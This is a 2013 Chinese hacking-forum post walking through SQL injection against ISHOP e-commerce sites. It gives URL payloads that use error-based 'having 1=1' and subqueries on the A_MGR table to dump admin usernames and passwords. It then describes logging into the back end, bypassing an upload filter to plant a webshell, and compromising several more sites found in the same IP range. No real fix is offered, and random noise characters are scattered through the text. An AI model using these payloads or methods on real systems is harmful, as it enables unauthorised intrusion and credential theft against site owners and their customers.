找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2223|回复: 0
打印 上一主题 下一主题

ISHOP商场建站系统注入漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-4 17:40:38 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
发现一个注入点) T& ~1 k: }, I
http://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
! g. D0 V; T: u! \- x; c; I0 N& e6 ^, R7 K6 o( X$ n
习惯性的加’having1=1--
$ X" Z& H2 |9 n1 z! N3 W8 [: @5 X" `, o) O1 W$ b6 |! g# J
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—
! Q4 u  o) ]) B; U2 T* F& `0 |2 @; N) {; B0 w6 h7 @
07 @: P8 C' u4 W0 E+ C7 K* m

0 f- G1 D% u# L" _4 T爆出Diary_A.dl_Title(这时候很激动啊)& }; o  C7 U7 s2 L0 c" K+ E
% c0 a/ \! ~7 t/ F* o. g
那么继续
# N% ?. M% J* _- ~( Z. J4 ~$ lhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—
; s& }! n3 p& Z, W1 u" N
; l$ V4 k3 e% R' Q" R# r继续,一直爆下去
- H% q! t6 m# X4 `! D9 _" L1 k# y
( E/ [" n0 D; B. c' O爆到几个字段和表段 但是没找到需要的管理用户的字段
) G" E; `. {  w% J) o. {1 S% p
5 e& T4 C- s2 q4 [蛋疼了 怎么办 然后去后台登陆页看源码
  H2 ]7 V& P! z$ _9 K
+ g, \2 y( |% F0
/ j) G; K) T& r6 \6 }' f1 N# T) w6 t- c; H+ O2 C/ G
Input name= “ADUID”
8 g$ F$ m7 E: h3 {Input name= “ADPWD”# d: n6 ]2 N7 L6 R8 M
) A: z( {5 }* n# u
很幸运 找到了字段那就继续
$ w6 L- [! o- P( j找到之后开始爆用户
, X( N& a, i' V% l6 ^0 Rhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—
  I( P, y. @7 \  I  I爆密码
, N. n* c( ^% w2 Thttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—
, a, S: R  y. X! M  a& {测试了下 这个注入点只能爆到文章哪里的表 3 \4 s$ O$ ]4 C! h* c

( N' N; r- N$ I) `4 y头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了
7 J. D1 |$ Y. z# n" M: ?, R8 z2 y2 H# E+ {3 l' t
又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了$ [* e; N" n7 M2 T6 H
+ Y5 ?: q0 d% C7 Z9 e1 k
473; g% d$ Y% n& r* I: Y! B
2 |# h# v0 k$ M' }1 o5 Z' N0 M
进后台" q; G5 f6 _: ~$ t8 x* W* V

9 H3 E# A* o. Y  O# S
7 d  x+ L1 n7 Z4 {# g0 D- U& ^4 ?发现几个上传点 有的地方不能上传 而且防止恶意代码
  L0 U4 A. x, s& ^. o
" S& E0 y5 `& i- {' ]* o没办法 各种百度各种找大牛 找到一只好像可以突破的马4 C; L* U6 E) z% w' p. Z) x; O

5 |# C/ c6 t. {# {5 k2 T& Z9 A' A! }8 d. Z: d+ e8 D* _
在系统管理那里直接上传 不过没有显示地址# x  ~  V% `2 S: M+ E) T
2 r/ J" y( M9 Y
再上传一次 抓包 搞定OK0 b; }! k$ J0 ~  K3 S/ ?

" U- y. y! p- W9 g+ }
8 h* @3 }7 ?6 B" L" T9 s" S* p, ~+ N: O; ?% ?
472
: a6 O. \0 j. |) q' _' V1 L) j+ _$ C4 q, K4 h5 C
晚上不行了 去睡觉。。。: v1 N. W, ]) A+ X' m  L
第二天刚起床 闲的没事做继续日站吧 / @8 X* |3 J5 x- A, N
# R2 ]0 Q' a6 H' F
找个站 就把这个站的旁c扫了下& j3 d  J' I# `/ u
( y6 p4 l0 N8 {+ _0 M$ h4 g
发现c段也有一个购物站 ,然后还和这个站的模板差不多6 A% T- D( n/ _& _' C4 V0 f
% v3 T0 w. |- c$ p; K; K6 ~) {
就找到会员登录口测试
% p9 z, [4 g  t  Z/ S: h# ~1 U; ?0 t2 O$ f: a9 K- \
'and (select top 1 MGR_UID from A_MGR)>0—
1 `; F/ e3 K6 s3 A果断爆到了 这时候我很激动 通杀
  Y6 n, T8 y1 y- V
# h/ d$ v8 h# l: X" C8 @8 B5 r再次翻c段
/ y1 t* S) s/ X$ x5 g. Q9 L1 l1 o4 U0 X
翻出几个站 都成功拿下
3 N' O) |+ ^8 v8 U2 f7 {4 j5 _, U$ @: P5 ]; `5 A/ M; W

* `% j/ O  N( a6 F0 o1 B% j7 Z3 I+ \* u: X* ~9 M3 @4 |) I- j
修复方案:
3 z+ [7 m6 O- Q1 [, Z$ z/ g他们比我专业 ( d' Z7 e6 h# G6 ]6 f" K

% M& T5 c/ z, y: ?! i  C
" u3 E, |4 `" B+ r& m: W9 H% h/ r& g# ~& q% O4 ~
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表